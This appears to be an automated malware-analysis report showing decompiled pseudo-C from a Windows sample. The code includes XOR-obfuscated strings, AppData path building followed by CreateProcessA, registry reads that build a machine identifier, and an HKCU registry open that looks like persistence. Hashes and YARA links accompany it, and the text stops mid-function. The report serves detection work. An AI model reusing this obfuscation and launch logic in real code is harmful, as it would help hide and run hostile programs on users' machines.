lstrcatA.KERNEL32(00000000,?,?), ref: 00B44E07
lstrcatA.KERNEL32(00000000,?), ref: 00B44EDB
lstrcatA.KERNEL32(00000000,00000000), ref: 00B44EDF
lstrcatA.KERNEL32(00000000,?), ref: 00B44EF9
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00B44F38

Strings

Tett, xrefs: 00B44F14
9;, xrefs: 00B44D61
6>, xrefs: 00B44D6B

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$Process$FolderPath$CreateCurrentOpenWow64
String ID: 6>$9;$Tett
API String ID: 3226924228-1827138343
Opcode ID: 981124911325d0b350ce8f5938968699e733c9d5e8c09f42fedbee88abd490ce
Instruction ID: 06f21887c8289e29cf1415a648942e5d8abb61f1750d3ac3329c8c33516f11c4
Opcode Fuzzy Hash: 981124911325d0b350ce8f5938968699e733c9d5e8c09f42fedbee88abd490ce
Instruction Fuzzy Hash: EA61D4614083849EE321DF38DC41BAFBBE8EFDA304F10455DF9C897162EA7459899B63

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B36D, Relevance: 18.4, APIs: 12, Instructions: 375
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00B5B36D(char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				intOrPtr* _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t234 = E00B598AF(1, 0x50);
					_v8 = _t234;
					E00B564B8(0);
					if(_t234 != 0) {
						_t227 = E00B598AF(1, 4);
						_v12 = _t227;
						E00B564B8(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0xb690c0, _t212 << 2);
								L24:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L26;
							}
							_t232 = E00B598AF(1, 4);
							_v16 = _t232;
							E00B564B8(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E00B5EDC5(_t209,  *((intOrPtr*)(_t209 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E00B5EDC5(_t209,  *((intOrPtr*)(_t209 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E00B5EDC5(_t209,  *((intOrPtr*)(_t209 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E00B5EDC5(_t209, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E00B5EDC5(_t209, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E00B5EDC5(_t209, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E00B5EDC5(_t209, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E00B5EDC5(_t209, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E00B5EDC5(_t209, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E00B5EDC5(_t209, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E00B5EDC5(_t209, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E00B5EDC5(_t209, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E00B5EDC5(_t209, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E00B5EDC5(_t209, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E00B5EDC5(_t209, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E00B5EDC5(_t209, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E00B5EDC5(_t209, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E00B5EDC5(_t209, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E00B5EDC5(_t209, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E00B5EDC5(_t209, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E00B5EDC5(_t209, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while(1) {
										_t195 =  *_t226;
										if(_t195 == 0) {
											break;
										}
										_t61 = _t195 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t195 != 0x3b) {
												L16:
												_t226 = _t226 + 1;
												continue;
											}
											_t257 = _t226;
											do {
												_t196 = _t257 + 1;
												_t222 =  *_t196;
												 *_t257 = _t222;
												_t257 = _t196;
											} while (_t222 != 0);
											continue;
										}
										 *_t226 = _t221;
										goto L16;
									}
									goto L24;
								}
								E00B5B26F(_v8);
								E00B564B8(_v8);
								E00B564B8(_v12);
								E00B564B8(_v16);
								goto L4;
							}
							E00B564B8(_t234);
							E00B564B8(_v12);
							L7:
							goto L4;
						}
						E00B564B8(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0xb690c0;
					L26:
					_t105 =  *(_t209 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E00B564B8( *(_t209 + 0x88));
							E00B564B8( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t231;
					 *(_t209 + 0x88) = _t236;
					return 0;
				}
			}

APIs

_free.LIBCMT ref: 00B5B3B5
_free.LIBCMT ref: 00B5B3D9
_free.LIBCMT ref: 00B5B3E6
_free.LIBCMT ref: 00B5B40B
_free.LIBCMT ref: 00B5B418
_free.LIBCMT ref: 00B5B421
_free.LIBCMT ref: 00B5B6FC
_free.LIBCMT ref: 00B5B704

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f408152af289e4c07f822128f0081490be843506b7f0cc5f2047164fdae7b868
Instruction ID: c125d5a726baf6fa5991837ec093c05832e9b264c5fc99ac17e1089b7db72c6a
Opcode Fuzzy Hash: f408152af289e4c07f822128f0081490be843506b7f0cc5f2047164fdae7b868
Instruction Fuzzy Hash: FDC13472D40204AFDB20DBA8CC86FEE77F8AB48741F1441E5FE49FB286D6709A459760

Uniqueness

Uniqueness Score: -1.00%

Function 00B44A91, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 187
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00B44A91(void* __ebx, void* __edi, void* __esi, void* __ebp, void* __eflags) {
				signed int _v8;
				signed int _v48;
				char _v55;
				short _v68;
				intOrPtr _v72;
				char _v139;
				short _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v156;
				char _v164;
				char _v184;
				struct _STARTUPINFOA _v260;
				struct _PROCESS_INFORMATION _v276;
				CHAR* _v280;
				CHAR* _v284;
				char _v291;
				char _v292;
				signed int _t49;
				CHAR* _t53;
				intOrPtr _t59;
				void* _t63;
				void _t64;
				void _t65;
				CHAR* _t71;
				char _t74;
				CHAR* _t90;
				CHAR* _t91;
				signed char _t92;
				void* _t97;
				signed int _t102;
				void* _t108;
				intOrPtr* _t109;
				void* _t112;
				signed int _t113;
				void* _t115;
				void* _t118;
				long _t123;
				intOrPtr* _t126;
				void* _t127;
				CHAR* _t128;
				CHAR* _t129;
				signed int _t132;
				void* _t134;

				_t132 =  &(_v260.lpDesktop);
				_t49 =  *0xb69014; // 0x7e8b4fb6
				_v8 = _t49 ^ _t132;
				_v260.dwY = E00B509A2();
				E00B42861(0x104, __esi, _t51);
				_t53 = E00B509A2();
				_t126 = __imp__SHGetFolderPathA;
				_t90 = _t53;
				_v260.lpDesktop = _t90;
				 *_t126(0, 0x1c, 0, 0, _t90, 0x208, 0x104);
				asm("movaps xmm0, [0xb3db90]");
				_t97 = 0;
				asm("movups [esp+0x7c], xmm0");
				_v152 = 0x73203423;
				_v148 = 0x36223410;
				_v144 = 4;
				do {
					_t7 = _t97 + 0x40; // 0x40
					 *(_t132 + _t97 + 0x7c) =  *(_t132 + _t97 + 0x7c) ^ _t7;
					_t97 = _t97 + 1;
				} while (_t97 < 0x19);
				_v139 = 0;
				lstrcatA(_t90,  &_v164);
				_t59 = E00B509A2();
				_v276.hThread = _t59;
				_t91 = E00B509A2();
				_v276.dwThreadId = _t91;
				 *_t126(0, 0x1c, 0, 0, _t91, 0x104, 0x40);
				asm("movaps xmm0, [0xb3da90]");
				asm("movups [esp+0x7c], xmm0");
				_t63 = E00B42D2B( &_v184);
				_t112 = _t63;
				_t127 = _t63;
				do {
					_t64 =  *_t112;
					_t112 = _t112 + 1;
				} while (_t64 != 0);
				_t113 = _t112 - _t127;
				_t17 = _t91 - 1; // -1
				_t118 = _t17;
				do {
					_t65 =  *(_t118 + 1);
					_t118 = _t118 + 1;
				} while (_t65 != 0);
				_t102 = _t113 >> 2;
				memcpy(_t118, _t127, _t102 << 2);
				memcpy(_t127 + _t102 + _t102, _t127, _t113 & 0x00000003);
				_t134 = _t132 + 0x18;
				_t128 = _v292;
				E00B4A313(_t91, _t128, _t128);
				lstrcatA(_t91, _t128);
				E00B48B24(_v292, _t91);
				_push(0x208);
				_t71 = E00B509A2();
				asm("movaps xmm0, [0xb3de70]");
				_t129 = _t71;
				asm("movups [esp+0x9c], xmm0");
				asm("movaps xmm0, [0xb3dc70]");
				_t108 = 0;
				asm("movups [esp+0xa8], xmm0");
				_v72 = 0xd1cbc58d;
				asm("movaps xmm0, [0xb3de60]");
				asm("movups [esp+0xb8], xmm0");
				_v68 = 0x99;
				asm("movaps xmm0, [0xb3db80]");
				asm("movups [esp+0xc8], xmm0");
				asm("movaps xmm0, [0xb3df50]");
				asm("movups [esp+0xd8], xmm0");
				asm("movaps xmm0, [0xb3df80]");
				asm("movups [esp+0xe8], xmm0");
				do {
					_t24 = _t108 + 0x40; // 0x40
					 *(_t134 + _t108 + 0x98) =  *(_t134 + _t108 + 0x98) ^ _t24;
					_t108 = _t108 + 1;
				} while (_t108 < 0x65);
				_t109 =  &_v156;
				_v55 = 0;
				_t115 = _t129 - _t109;
				do {
					_t74 =  *_t109;
					 *((char*)(_t115 + _t109)) = _t74;
					_t109 = _t109 + 1;
				} while (_t74 != 0);
				_t92 = 0x62;
				_v291 = 0;
				_v291 = 0;
				_v292 = _t92 ^ 0x00000040;
				lstrcatA(_t129,  &_v292);
				lstrcatA(_t129, _v284);
				_v291 = 0;
				_v292 = _t92 ^ 0x00000040;
				_v291 = 0;
				lstrcatA(_t129,  &_v292);
				_t123 = 0x44;
				E00B4D0F0(_t123,  &_v260, 0, _t123);
				_v260.cb = _t123;
				_v260.lpDesktop = 0xb699c0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA(_v280, _t129, 0, 0, 0, 0, 0, 0,  &_v260,  &_v276);
				return E00B4AE43(_v48 ^ _t134 + 0x0000000c);
			}

APIs

Part of subcall function 00B42861: RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00B428DC

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000,00000000,770BE3A0,?,?), ref: 00B44ADE
lstrcatA.KERNEL32(00000000,?), ref: 00B44B2F
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000), ref: 00B44B52
lstrcatA.KERNEL32(00000000,?,?), ref: 00B44B9B
lstrcatA.KERNEL32(00000000,?), ref: 00B44C6F
lstrcatA.KERNEL32(00000000,?), ref: 00B44C76
lstrcatA.KERNEL32(00000000,?), ref: 00B44C90
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00B44CCF

Strings

Tett, xrefs: 00B44CAB
#4 s, xrefs: 00B44AEE

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$FolderPath$CreateOpenProcess
String ID: #4 s$Tett
API String ID: 2997047404-1022402705
Opcode ID: f3f3b7ff630584bbb4b679dd3a2efd3fe009a981c56fad75439be2f6dbf7438d
Instruction ID: d1f55ea46edd5c9a5dda0e3237a857593302cf42e04cb5f42ebc628ea5c371be
Opcode Fuzzy Hash: f3f3b7ff630584bbb4b679dd3a2efd3fe009a981c56fad75439be2f6dbf7438d
Instruction Fuzzy Hash: 906105614083859EE321DF38DC41BAFFBE8EF99308F00495DF9D897162EB7195898762

Uniqueness

Uniqueness Score: -1.00%

Function 00B4A313, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00B4A313(void* __ebx, void* __esi, CHAR* _a4) {
				signed int _v12;
				char _v247;
				char _v249;
				char _v253;
				char _v254;
				char _v258;
				char _v259;
				char _v263;
				char _v264;
				char _v272;
				char _v274;
				short _v276;
				intOrPtr _v280;
				char _v284;
				char _v285;
				char _v316;
				void* _v320;
				int _v324;
				signed int _t35;
				int* _t58;
				CHAR* _t64;
				signed int _t66;

				_t35 =  *0xb69014; // 0x7e8b4fb6
				_v12 = _t35 ^ _t66;
				asm("movaps xmm0, [0xb3dbd0]");
				asm("movups [ebp-0x138], xmm0");
				asm("movaps xmm0, [0xb3dac0]");
				_t58 = 0;
				_t64 = _a4;
				asm("movups [ebp-0x128], xmm0");
				do {
					_t3 = _t58 + 0x40; // 0x40
					 *(_t66 + _t58 - 0x138) =  *(_t66 + _t58 - 0x138) ^ _t3;
					_t58 = _t58 + 1;
				} while (_t58 < 0x1f);
				_v285 = 0;
				if(RegOpenKeyExA(0x80000002,  &_v316, 0, 0x20119,  &_v320) == 0) {
					_v324 = 0x100;
					_v284 = 0x2b21200d;
					_t15 =  &_v284; // 0x2b21200d
					_v280 = 0x232b2d;
					_v276 = 0x2e203d;
					if(RegQueryValueExA(_v320, E00B427DA(_t15), 0, 0,  &_v272,  &_v324) == 0) {
						_t20 =  &_v284; // 0x2b21200d
						_push(_v247);
						_v264 = 0;
						_push( &_v253);
						_v259 = 0;
						_push( &_v258);
						_v254 = 0;
						_push( &_v263);
						_v249 = 0;
						_push( &_v272);
						_v284 = 0x30673265;
						_v280 = 0x34633661;
						_v276 = 0x2a6d;
						_v274 = 0;
						wsprintfA(_t64, E00B4282B(_t20));
						CharUpperBuffA(_t64, 0x17);
					}
					RegCloseKey(_v320);
				}
				return E00B4AE43(_v12 ^ _t66);
			}

APIs

RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?,?,76D681D0), ref: 00B4A37A
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00B4A3D2
wsprintfA.USER32 ref: 00B4A448
CharUpperBuffA.USER32(?,00000017), ref: 00B4A454
RegCloseKey.ADVAPI32(?), ref: 00B4A460

Strings

!+, xrefs: 00B4A3AC
= ., xrefs: 00B4A3BC
m*, xrefs: 00B4A432
a6c4, xrefs: 00B4A428

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharCloseOpenQueryUpperValuewsprintf
String ID: !+$= .$a6c4$m*
API String ID: 4023059497-2212919601
Opcode ID: 8dd7eb5b41f850c21d5bc68df07b3587745e767e2043e62c679445f5c190eda7
Instruction ID: 1350593dab1eedc7fce22edc0a84e1ec3e302e11a023b76af5983642f2028b1b
Opcode Fuzzy Hash: 8dd7eb5b41f850c21d5bc68df07b3587745e767e2043e62c679445f5c190eda7
Instruction Fuzzy Hash: 1031707094426C9ADB21DF24DC91BEDFBBCAF19304F0041E9E549A3151EA705BD8DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00B581F3, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B581F3(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0xb34c38;
				if(_t67 != 0xb34c38) {
					E00B564B8(_t67);
					_t36 = _a4;
				}
				E00B564B8( *((intOrPtr*)(_t36 + 0x3c)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x30)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x34)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x38)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x28)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x2c)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x40)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x44)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E00B5803B(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E00B5809C(_t71, _t75);
			}

APIs

_free.LIBCMT ref: 00B58209

Part of subcall function 00B564B8: HeapFree.KERNEL32(00000000,00000000,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B58215
_free.LIBCMT ref: 00B58220
_free.LIBCMT ref: 00B5822B
_free.LIBCMT ref: 00B58236
_free.LIBCMT ref: 00B58241
_free.LIBCMT ref: 00B5824C
_free.LIBCMT ref: 00B58257
_free.LIBCMT ref: 00B58262
_free.LIBCMT ref: 00B58270

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 37aad600ccc93047a1db93c528f597ab29cd3312a6ed496935ee37dae13b0946
Instruction ID: 301c289f1edfd37ecffe80376c257fc399740b68c4e2f19962dc498e4ae1af58
Opcode Fuzzy Hash: 37aad600ccc93047a1db93c528f597ab29cd3312a6ed496935ee37dae13b0946
Instruction Fuzzy Hash: 30218976900108AFCF41EF94C841DDD7BF9EF08351F8145E5BA15AB221DB35DA588B90

Uniqueness

Uniqueness Score: -1.00%

Function 00B63CF6, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 148COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00B60306), ref: 00B63D0F

Strings

log10, xrefs: 00B63D51, 00B63D60
sqrt, xrefs: 00B63E4E
exp, xrefs: 00B63D8E, 00B63DF3
log, xrefs: 00B63D6C, 00B63D7B
asin, xrefs: 00B63E3C
acos, xrefs: 00B63E45
pow, xrefs: 00B63DAD, 00B63E57, 00B63EA4

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 0e044e5675206802bb2b54a347d1888f98c9ff06852128dee6cbc277cf5d2c0a
Instruction ID: 4e179611c378abf2f7ef6a740d44791ba04d2ba7f12838b3d8e032bbebb1490c
Opcode Fuzzy Hash: 0e044e5675206802bb2b54a347d1888f98c9ff06852128dee6cbc277cf5d2c0a
Instruction Fuzzy Hash: B1517A7190850ACBCF209F59D98C1ADBBF0FF45B14F2040D5D891A7258CB7A8A25DB75

Uniqueness

Uniqueness Score: -1.00%

Function 00B42B76, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
registryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00B42B76(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				char _v16;
				char _v17;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v40;
				void* _v44;
				signed int _v48;
				signed int _t39;
				char* _t41;
				char _t44;
				void* _t46;
				long _t48;
				void* _t52;
				void _t53;
				void _t54;
				char* _t63;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				signed int _t70;
				void* _t79;
				void* _t80;
				signed int _t81;
				intOrPtr _t83;
				void* _t84;
				void* _t90;
				signed int _t91;

				_t39 =  *0xb69014; // 0x7e8b4fb6
				_v12 = _t39 ^ _t91;
				_t83 = _a4;
				_push(0x208);
				_t41 = E00B509A2();
				asm("movaps xmm0, [0xb3dba0]");
				_t63 = _t41;
				asm("movups [ebp-0x24], xmm0");
				_v24 = 0x2426373f;
				_t65 = 0;
				_v20 = 0x332735;
				do {
					_t5 = _t65 + 0x40; // 0x40
					 *(_t91 + _t65 - 0x24) =  *(_t91 + _t65 - 0x24) ^ _t5;
					_t65 = _t65 + 1;
				} while (_t65 < 0x17);
				_t66 =  &_v40;
				_v17 = 0;
				_t79 = _t63 - _t66;
				do {
					_t44 =  *_t66;
					 *((char*)(_t66 + _t79)) = _t44;
					_t66 = _t66 + 1;
				} while (_t44 != 0);
				_v48 = _v48 & 0x00000000;
				_t46 = GetCurrentProcess();
				__imp__IsWow64Process(_t46,  &_v48);
				if(_t46 == 0 || _v48 == 0) {
					_t48 = RegOpenKeyA(0x80000001, _t63,  &_v44);
				} else {
					_t48 = RegOpenKeyExA(0x80000001, _t63, 0, 0x101,  &_v44);
				}
				if(_t48 == 0) {
					asm("movaps xmm0, [0xb3ddd0]");
					_t67 = 0;
					asm("movups [ebp-0x24], xmm0");
					_v24 = 0x733e3d31;
					_v20 = 0x3f223404;
					_v16 = 0;
					do {
						_t22 = _t67 + 0x40; // 0x40
						 *(_t91 + _t67 - 0x24) =  *(_t91 + _t67 - 0x24) ^ _t22;
						_t67 = _t67 + 1;
					} while (_t67 < 0x18);
					_push(_t67);
					_v16 = 0;
					E00B42CCF(_t67, _v44,  &_v40, _t83);
					_v28 = 0x2d37202c;
					_v24 = 0x35232d27;
					_v20 = 0x2e322c66;
					_v16 = 0;
					_t52 = E00B42810( &_v28);
					_t80 = _t52;
					_t90 = _t52;
					do {
						_t53 =  *_t80;
						_t80 = _t80 + 1;
					} while (_t53 != 0);
					_t81 = _t80 - _t90;
					_t84 = _t83 - 1;
					do {
						_t54 =  *(_t84 + 1);
						_t84 = _t84 + 1;
					} while (_t54 != 0);
					_t70 = _t81 >> 2;
					memcpy(_t84, _t90, _t70 << 2);
					memcpy(_t90 + _t70 + _t70, _t90, _t81 & 0x00000003);
					RegCloseKey(_v44);
					E00B50985(_t63);
				} else {
				}
				return E00B4AE43(_v12 ^ _t91);
			}

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 00B42BE0
IsWow64Process.KERNEL32(00000000), ref: 00B42BE7
RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000101,?), ref: 00B42C08
RegOpenKeyA.ADVAPI32(80000001,00000000,?), ref: 00B42C1A
RegCloseKey.ADVAPI32(?,?,?,?,00000001), ref: 00B42CB1

Strings

'-#5, xrefs: 00B42C73
, 7-, xrefs: 00B42C6C
f,2., xrefs: 00B42C7A

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenProcess$CloseCurrentWow64
String ID: '-#5$, 7-$f,2.
API String ID: 3785737565-2631701596
Opcode ID: f688f145ee64f6289b4f2d9ce8bb2f36469339ecadd9f2c1d4e6fb985bbb35d6
Instruction ID: ff540c6a9e4517263457a1eece7489957363b5e0b10d5d039dabd520ae5cf630
Opcode Fuzzy Hash: f688f145ee64f6289b4f2d9ce8bb2f36469339ecadd9f2c1d4e6fb985bbb35d6
Instruction Fuzzy Hash: 3041FF709042489AEF05CFB8D8847FEBBF8EF59304F5041A8E541B6282DB754A45DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00B5AADF, Relevance: 12.2, APIs: 8, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00B5AADF(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				signed int _t97;
				intOrPtr* _t98;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				if(_t146 != 0) {
